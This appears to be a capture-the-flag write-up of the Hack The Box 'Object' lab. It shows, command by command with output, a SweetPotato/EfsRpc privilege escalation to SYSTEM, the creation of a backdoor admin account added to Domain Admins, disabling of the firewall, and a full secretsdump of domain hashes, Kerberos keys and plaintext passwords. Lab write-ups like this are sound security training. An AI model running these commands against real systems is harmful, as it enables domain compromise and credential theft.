SweetPotato
As discovered previously, the oliver user with the Jenkins security context is a service account with membership to the NT AUTHORITY\SERVICE group
The user also has SeImpersonatePrivilege enabled
this makes the target system vulnerable to the potato exploits
while juicypotato for token impersonation does not work on anything above windows 10 1809 & windows server 2019, i should be able to use sweetpotato
sweetpotato is a collection of various native windows privilege escalation techniques from service accounts to system. it has been created by @ethicalchaos and includes:
- RottenPotato
- Weaponized JuciyPotato with BITS WinRM discovery
- PrintSpoofer discovery and original exploit
- EfsRpc built on EfsPotato
- PetitPotam
Exploit
The binary can be downloaded from the official GitHub repo
Exploitation
*evil-winrm* ps c:\Users\oliver\Documents> upload SweetPotato.exe C:\tmp\
info: Uploading /home/kali/archive/htb/labs/object/SweetPotato.exe to C:\tmp\
data: 1234944 bytes of 1234944 bytes copied
info: Upload successful!
*evil-winrm* ps c:\Users\oliver\Documents> upload pe.exe C:\tmp\
info: Uploading /home/kali/archive/htb/labs/object/pe.exe to C:\tmp\
data: 15872 bytes of 15872 bytes copied
info: Upload successful!I will upload the exploit and payload through the existing PowerShell session
*evil-winrm* ps c:\Users\oliver\Documents> .\SweetPotato.exe --help
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
-c, --clsid=value clsid (default bits:
4991D34B-80A1-4291-83B6-3328366B9097)
-m, --method=VALUE Auto,User,Thread (default Auto)
-p, --prog=VALUE Program to launch (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-e, --exploit=VALUE Exploit mode
[DCOM|WinRM|EfsRpc|PrintSpoofer(default)]
-l, --listenPort=VALUE COM server listen port (default 6666)
-h, --help Display this helpThe exploit also has a help menu for different methods. While the transfer was done through the existing PowerShell session, execution must be done with the Jenkins security context
Initial Fail
The command above uses the EsfRpc method, which targets the MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege
The exploit appears to be a success
However, nothing came through on the Netcat listener on Kali
There are a few possible causes for this;
- Firewall is restricting outbound connection
- payload failed
Due to the potential issues above, I will first need to validate if the command execution is invoked
Validation
c:\tmp\SweetPotato.exe -p "cmd.exe" -a "/c whoami.exe /all > c:\tmp\who.txt" -e EfsRpc
By default, SweetPotato exploit launches cmd.exe, but I will specify it just in case
the command above will write the output of whoam.exe /all command to the c:\tmp\who.txt file
*evil-winrm* ps c:\tmp> ls
directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/20/2023 8:15 AM 15872 pe.exe
-a---- 9/20/2023 7:28 AM 152001 peas.txt
-a---- 9/20/2023 7:29 AM 926208 SweetPotato.exe
-a---- 9/20/2023 8:26 AM 5007 who.txt
-a---- 9/20/2023 6:43 AM 1969152 winPEASany.exethere is the who.txt file at the c:\tmp directory, which suggests that the exploit indeed worked out
*evil-winrm* ps c:\tmp> cat who.txt
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.Confirmed
Adding to Domain Admins
C:\tmp\SweetPotato.exe -p "cmd.exe" -a "/c net user /ADD badmin Qwer1234 && net localgroup administrators /ADD badmin" -e EfsRpc
Leveraging the cmd.exe executable, I can create a local admin user; badmin
This way, I don’t need to bother with either payload or Firewall
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ evil-winrm -i $IP -u badmin -p 'Qwer1234'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\badmin\Documents> net group /DOMAIN "Domain Admins" /ADD badmin
The command completed successfully.A PowerShell session established as the badmin user
Now, with privileges of a local administrator, I will add the newly created badmin user to the Domain Admins group
*Evil-WinRM* PS C:\Users\badmin\Documents> net groups /Domain "Domain Admins"
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator badmin
The command completed successfully.
*Evil-WinRM* PS C:\Users\badmin\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
object\badmin S-1-5-21-4088429403-1159899800-2753317549-7601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\badmin\Documents> hostname
jenkins
*Evil-WinRM* PS C:\Users\badmin\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::20c
IPv6 Address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30
Link-local IPv6 Address . . . . . : fe80::f00b:8831:17ef:6c30%12
IPv4 Address. . . . . . . . . . . : 10.10.11.132
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2Done
Shell Drop
*evil-winrm* ps c:\Users\badmin\Documents> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled FalseDisabling the firewall
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ impacket-psexec object.local/badmin:Qwer1234@jenkins.object.local -dc-ip $IP 130 ⨯
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on jenkins.object.local.....
[*] Found writable share ADMIN$
[*] Uploading file fWgwBbgH.exe
[*] Opening SVCManager on jenkins.object.local.....
[*] Creating service Gfrp on jenkins.object.local.....
[*] Starting service Gfrp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
jenkins
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::239
ipv6 address. . . . . . . . . . . : dead:beef::8b9:62bc:32b2:9cb2
link-local ipv6 address . . . . . : fe80::8b9:62bc:32b2:9cb2%12
ipv4 address. . . . . . . . . . . : 10.10.11.132
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2System Level Compromise
Hashdump
*Evil-WinRM* PS C:\Users\badmin\Documents> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled FalseDisabling the firewall
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ rustscan -a $IP -b 25000
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.11.132:53
Open 10.10.11.132:80
Open 10.10.11.132:88
Open 10.10.11.132:135
Open 10.10.11.132:139
Open 10.10.11.132:389
Open 10.10.11.132:445
Open 10.10.11.132:464
Open 10.10.11.132:593
Open 10.10.11.132:636
Open 10.10.11.132:3268
Open 10.10.11.132:3269
Open 10.10.11.132:5985
Open 10.10.11.132:8080
Open 10.10.11.132:9389Now, I can reach those regular AD services
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ impacket-secretsdump OBJECT.LOCAL/badmin:Qwer1234@jenkins.object.local -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.11/site-packages/impacket
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0xad7915b8e6d4f9ee383a5176349739e3
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2d83ac238ce0bf56a0538c867bcb04a3:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[+] Looking into NL$2
[+] Looking into NL$3
[+] Looking into NL$4
[+] Looking into NL$5
[+] Looking into NL$6
[+] Looking into NL$7
[+] Looking into NL$8
[+] Looking into NL$9
[+] Looking into NL$10
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
OBJECT\JENKINS$:aes256-cts-hmac-sha1-96:25bf7969871170e71cec01384e4a6b42d37bc5eafb38022e1518aa59fba9f841
OBJECT\JENKINS$:aes128-cts-hmac-sha1-96:e049ba9256fea4457e3b1008cb447d2b
OBJECT\JENKINS$:des-cbc-md5:e38f76a43402266e
OBJECT\JENKINS$:plain_password_hex:c516ec95139214a8f77a6aa1e1b18a67bb59072eea2925df5e182ee2e0199173df5531976aaaa64d95de7eee44a674e93d13681585a65c822ffc8b28413363ecf43163a6e2ba08a40579a213ae1ff8f8cf087471b182d4a7f6e9307f51f39e74ee73d71a47de9aa5c40ff3acebb2d9c6e7d6f0aaad16ddcabc5ab9273521e2be3f6225ada137730925b509b766cbb3015b8c9cb8add107233e71d29c05d3f13666b1f73bebee5fcef9b6bb687b8b7768bb6156f969d2307a4fba236ad0c6afb815b2293107cc359c77232d3b84b4ee0a977f08ba0c47c318b8d01baf1a96446571ad673ef7c35eb009c39e90a91a9816
OBJECT\JENKINS$:aad3b435b51404eeaad3b435b51404ee:52a944f0993a167ecfe952c304f318f6:::
[+] Looking into DefaultPassword
[*] DefaultPassword
OBJECT\administrator:n0w_u_s33_m3_0_o
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
dpapi_machinekey:0xee3ee8172d485d91d928e75a6199a2d9d1552d2a
dpapi_userkey:0x872350e7691cd1f10c04962e21f42f7921a64796
[+] Looking into NL$KM
[*] NL$KM
0000 4D 9A AB A3 5A 7A 2F 50 25 FC 83 1A 10 FE 1E A5 M...Zz/P%.......
0010 D3 B9 9D A8 B5 4E EB 60 2B D6 78 53 7B 73 2A E0 .....N.`+.xS{s*.
0020 44 A8 77 0C 48 36 37 26 80 D0 2C 90 D4 16 AA E5 D.w.H67&..,.....
0030 66 53 4B 7F A9 2D 50 99 8A 26 0A 20 40 0D 9B E1 fSK..-P..&. @...
NL$KM:4d9aaba35a7a2f5025fc831a10fe1ea5d3b99da8b54eeb602bd678537b732ae044a8770c4836372680d02c90d416aae566534b7fa92d50998a260a20400d9be1
[+] Looking into _SC_Jenkins
[*] _SC_Jenkins
OBJECT\oliver:c1cdfun_d2434
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_CfcejRjS
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-500
[+] Calling DRSGetNCChanges for {db5685f4-aee6-4cbc-be31-08997025df10}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=object,DC=local
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c535031ee490da0a41327b6ed228acd:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-501
[+] Calling DRSGetNCChanges for {ec61ff21-35ba-4281-8bf0-c941fb5f757e}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Guest,CN=Users,DC=object,DC=local
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-502
[+] Calling DRSGetNCChanges for {f95afbaf-b546-4c4f-a8f0-f45ebc7b3cea}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=object,DC=local
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a2949eeb5f9dc9e0e295c85e2ee83043:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-1103
[+] Calling DRSGetNCChanges for {5413283d-6310-418b-9bd1-472ffc1f932d}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Olivar Ava,CN=Users,DC=object,DC=local
object.local\oliver:1103:aad3b435b51404eeaad3b435b51404ee:cae9745fc314e1586606ea8ff899b45a:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-1104
[+] Calling DRSGetNCChanges for {742c4a19-245f-42f0-829a-e30dcd298739}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Smith William,CN=Users,DC=object,DC=local
object.local\smith:1104:aad3b435b51404eeaad3b435b51404ee:742b7f2ccff4ca60d6d378eda85b9b09:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-1106
[+] Calling DRSGetNCChanges for {9340fcdd-2f1e-4f89-bafe-e1dcdd5c2b6f}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=maria garcia,CN=Users,DC=object,DC=local
object.local\maria:1106:aad3b435b51404eeaad3b435b51404ee:fea9359fe981f9dc1e72ee60a1a6d3ca:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-7601
[+] Calling DRSGetNCChanges for {6b736a0f-9b49-46a7-91bc-3ba7d2f12a22}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=badmin,CN=Users,DC=object,DC=local
badmin:7601:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-1000
[+] Calling DRSGetNCChanges for {f11ae853-8e36-4225-b5fe-7b882055f330}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=JENKINS,OU=Domain Controllers,DC=object,DC=local
JENKINS$:1000:aad3b435b51404eeaad3b435b51404ee:52a944f0993a167ecfe952c304f318f6:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:fd8b7324ebbeaf62392d39e893ff88260e14069a22205714aeb8c5932c611f4e
Administrator:aes128-cts-hmac-sha1-96:064bdb023a7e084507df03cc7d144747
Administrator:des-cbc-md5:5db962a137253ef4
krbtgt:aes256-cts-hmac-sha1-96:de7940c3a343b98a3ee6b61e94d2e0f208b2f138f42b9546409b387bd6a98289
krbtgt:aes128-cts-hmac-sha1-96:f3a679e20ef4c68419a4b152f0029081
krbtgt:des-cbc-md5:a823f83dc2083dc1
object.local\oliver:aes256-cts-hmac-sha1-96:4bfc34f04a5becda41922fd4ad819952d20a595f9a90262a090ccf6d78be0558
object.local\oliver:aes128-cts-hmac-sha1-96:028e96399e78bc001ac7bc276d819c88
object.local\oliver:des-cbc-md5:2fc82c9b2f7a02ec
object.local\smith:aes256-cts-hmac-sha1-96:f1e17bbe5fa70dc3c9675b6c71f1b96d6a9366e600a4d474354a4b9d5f834f47
object.local\smith:aes128-cts-hmac-sha1-96:244448cceb0c0c56c5525b6b0eaf9501
object.local\smith:des-cbc-md5:0b7ceaeab9374a46
object.local\maria:aes256-cts-hmac-sha1-96:80b6a51863012607396ba672989b015242a6626065405990502b26ac31ac293e
object.local\maria:aes128-cts-hmac-sha1-96:bf6a68fb3497c8c191cec62b3f4988e5
object.local\maria:des-cbc-md5:4fdcb6895479e983
badmin:aes256-cts-hmac-sha1-96:f4d0381c1f7417bf9923cbf0b7bc579e673cbb6a791ed9832ff0bdd0a0f69869
badmin:aes128-cts-hmac-sha1-96:c007d1fc53a876ccb0a3dc3b5f457a5b
badmin:des-cbc-md5:d316dac708d038e5
JENKINS$:aes256-cts-hmac-sha1-96:25bf7969871170e71cec01384e4a6b42d37bc5eafb38022e1518aa59fba9f841
JENKINS$:aes128-cts-hmac-sha1-96:e049ba9256fea4457e3b1008cb447d2b
JENKINS$:des-cbc-md5:c7809b378a83d9a2
[*] Cleaning up...
[*] Stopping service RemoteRegistryDomain Level Compromise